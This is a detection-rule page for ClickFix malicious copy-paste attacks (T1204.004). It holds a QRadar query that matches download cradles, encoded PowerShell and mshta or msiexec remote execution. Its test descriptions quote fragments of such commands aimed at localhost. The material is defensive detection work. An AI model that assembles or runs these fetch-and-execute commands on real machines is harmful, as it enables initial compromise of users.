T1204.004 IBM QRadar · QRadar

Detect Malicious Copy and Paste in IBM QRadar

Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.

MITRE ATT&CK

Tactic
Execution
Technique
T1204 User Execution
Sub-technique
T1204.004 Malicious Copy and Paste
Canonical reference
https://attack.mitre.org/techniques/T1204/004/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'YYYY-MM-dd HH:mm:ss') AS event_time,
  devicehostname AS hostname,
  username,
  CATEGORYNAME(category) AS event_category,
  QIDNAME(qid) AS event_name,
  UTF8(PAYLOAD) AS raw_payload,
  sourceip
FROM events
WHERE
  LOGSOURCETYPEID IN (12, 352)
  AND starttime > DATEADD('hour', -24, NOW())
  AND (
    (
      UTF8(PAYLOAD) ILIKE '%ParentImage%\\explorer.exe%'
      AND (
        UTF8(PAYLOAD) ILIKE '%Image%\\powershell.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\pwsh.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\cmd.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\mshta.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\wscript.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\cscript.exe%'
      )
    )
    OR (
      (
        UTF8(PAYLOAD) ILIKE '%ParentImage%\\chrome.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\firefox.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\msedge.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\iexplore.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\brave.exe%'
      )
      AND (
        UTF8(PAYLOAD) ILIKE '%Image%\\powershell.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\pwsh.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\cmd.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\mshta.exe%'
      )
    )
    OR (
      (
        UTF8(PAYLOAD) ILIKE '%Image%\\mshta.exe%'
        OR UTF8(PAYLOAD) ILIKE '%Image%\\wscript.exe%'
      )
      AND (
        UTF8(PAYLOAD) ILIKE '%ParentImage%\\explorer.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\chrome.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\firefox.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\msedge.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\iexplore.exe%'
        OR UTF8(PAYLOAD) ILIKE '%ParentImage%\\brave.exe%'
      )
      AND (
        UTF8(PAYLOAD) ILIKE '%javascript:%'
        OR UTF8(PAYLOAD) ILIKE '%vbscript:%'
        OR UTF8(PAYLOAD) ILIKE '%http://%'
        OR UTF8(PAYLOAD) ILIKE '%https://%'
      )
    )
  )
  AND (
    UTF8(PAYLOAD) ILIKE '%DownloadString%'
    OR UTF8(PAYLOAD) ILIKE '%DownloadFile%'
    OR UTF8(PAYLOAD) ILIKE '%Net.WebClient%'
    OR UTF8(PAYLOAD) ILIKE '%Invoke-WebRequest%'
    OR UTF8(PAYLOAD) ILIKE '%certutil%urlcache%'
    OR UTF8(PAYLOAD) ILIKE '%bitsadmin%transfer%'
    OR UTF8(PAYLOAD) ILIKE '%-EncodedCommand%'
    OR UTF8(PAYLOAD) ILIKE '%FromBase64String%'
    OR UTF8(PAYLOAD) ILIKE '%Invoke-Expression%'
    OR UTF8(PAYLOAD) ILIKE '%IEX(%'
    OR UTF8(PAYLOAD) ILIKE '%javascript:%'
    OR UTF8(PAYLOAD) ILIKE '%vbscript:%'
    OR UTF8(PAYLOAD) ILIKE '%msiexec%http%'
    OR UTF8(PAYLOAD) ILIKE '%regsvr32%/i:http%'
  )
ORDER BY starttime DESC
LIMIT 500
high severity medium confidence

Detects ClickFix / Malicious Copy-Paste (T1204.004) via Sysmon Process Create events (Event ID 1) ingested into QRadar. Matches three behavioral branches: explorer.exe (Windows Run dialog) or browser processes spawning scripting interpreters (PowerShell, cmd, mshta, wscript, cscript) where the resulting command line contains download cradles (Net.WebClient, certutil, bitsadmin, curl), encoded payload patterns (-EncodedCommand, FromBase64String), or inline execution (Invoke-Expression, IEX, javascript:, vbscript:). LOGSOURCETYPEID 12 targets Microsoft Windows Security Event Log; 352 targets Sysmon via Windows Event Forwarding.

Data Sources

IBM QRadar SIEM with Microsoft Windows log source (Sysmon Event ID 1 via WEF or direct agent)QRadar WinCollect agent collecting Microsoft-Windows-Sysmon/Operational channel

Required Tables

events

False Positives & Tuning

  • Enterprise endpoint management tools (SCCM, Intune, Ansible) that invoke PowerShell with download cradles or encoded commands via system-level parent processes that inherit explorer.exe context during user-interactive sessions.
  • Developers running legitimate base64-encoded or download-based PowerShell scripts from browser-integrated development environments or web-based dashboards (e.g., Jenkins build agents, GitLab CI runner UI).
  • Security operations personnel executing Atomic Red Team, MITRE Caldera, or manual adversary simulation tests against endpoints during authorized purple team exercises.
  • Help desk or remote support tools (e.g., ConnectWise, TeamViewer) that spawn scripting interpreters under the user session parent hierarchy to execute diagnostic or remediation scripts.
Download portable Sigma rule (.yml)

Other platforms for T1204.004

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1ClickFix Run Dialog PowerShell Download Cradle Simulation

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.

  2. Test 2ClickFix mshta Inline JavaScript Execution

    Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.

  3. Test 3ClickFix Base64-Encoded PowerShell via Run Dialog

    Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.

  4. Test 4ClickFix msiexec Remote Package Execution

    Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.

Last updated: 2026-04-19 Research depth: deep
References (8)

Unlock Pro Content

Get the full detection package for T1204.004 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1204User Execution

Related Sub-techniques

T1204.001Malicious LinkT1204.002Malicious FileT1204.003Malicious ImageT1204.005Malicious Library

Related Techniques

T1204User ExecutionT1204.002Malicious FileT1189Drive-by CompromiseT1566.002Spearphishing LinkT1059.001PowerShellT1059.003Windows Command ShellT1218.005MshtaT1105Ingress Tool TransferT1552.001Credentials In FilesT1027Obfuscated Files or InformationT1218.010Regsvr32

Same Tactic: Execution

Popular Detections